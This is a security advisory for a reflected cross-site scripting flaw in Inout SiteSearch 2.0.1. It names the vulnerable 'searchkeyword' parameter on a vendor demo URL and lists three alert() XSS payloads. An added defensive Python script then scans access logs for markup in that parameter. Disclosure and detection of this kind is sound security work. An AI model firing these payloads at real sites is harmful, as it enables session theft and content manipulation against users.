Inout SiteSearch 2.0.1 Cross Site Scripting
Inout SiteSearch version 2.0.1 suffers from a cross site scripting vulnerability.
CraCkEr
THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Exploits ]

Author    : CraCkEr
Website   : inoutscripts.com
Vendor    : Inout Scripts
Software  : Inout SiteSearch 2.0.1
Vuln Type : Cross Site Scripting Reflected
Method    : GET
Impact    : Manipulate the content of the site

Inout SiteSearch is a premium script that allows you to add a site search feature.

B4nks-NET irc.b4nks.tk #unix

Release Notes:

The attacker can send the victim a link containing a malicious URL in an email or instant message and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL Phr33k, NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7

CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022

GET parameter 'searchkeyword' is vulnerable to XSS

http://inout-sitesearch.demo.inoutscripts.net/index.php/search/result?searchkeyword=[XSS]

Some XSS Payloads Reflected

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

[-] Done
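
Added example (not part of the original advisory, and not code from the author or the vendor): a check that scans web-server access logs for requests to the affected path whose 'searchkeyword' value decodes to markup, including double-encoded values. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Path and parameter come from the advisory; the combined log format is assumed.
VULN_PATH = "/index.php/search/result"
VULN_PARAM = "searchkeyword"

REQUEST_RE = re.compile(r'"(?:GET|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Constructs a plain search keyword has no reason to carry: tag brackets,
# a javascript: scheme, or an inline event-handler attribute.
MARKUP_RE = re.compile(r"[<>]|javascript\s*:|\bon\w+\s*=", re.IGNORECASE)

# Constructed sample lines (benign markup only), not taken from real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2022:13:55:36 +0000] "GET /index.php/search/result?searchkeyword=blue+widgets HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2022:13:56:02 +0000] "GET /index.php/search/result?searchkeyword=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 5188',
    '203.0.113.9 - - [10/Oct/2022:13:56:40 +0000] "GET /index.php/search/result?searchkeyword=%253Ci%253Ex HTTP/1.1" 200 5170',
    '203.0.113.7 - - [10/Oct/2022:13:57:11 +0000] "GET /index.php/about?searchkeyword=%3Cb%3E HTTP/1.1" 200 2048',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %253C is treated like '<'."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_keywords(log_line):
    """Return decoded searchkeyword values on the affected path that contain markup."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group("target"))
    if url.path != VULN_PATH:
        return []
    # parse_qs performs the first round of percent-decoding.
    values = parse_qs(url.query, keep_blank_values=True).get(VULN_PARAM, [])
    decoded = [fully_decode(v) for v in values]
    return [d for d in decoded if MARKUP_RE.search(d)]


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for hit in suspicious_keywords(line):
            print("suspicious searchkeyword:", repr(hit))
```

A hit is a triage signal showing that markup reached the parameter; whether it was reflected unencoded still has to be confirmed against the response.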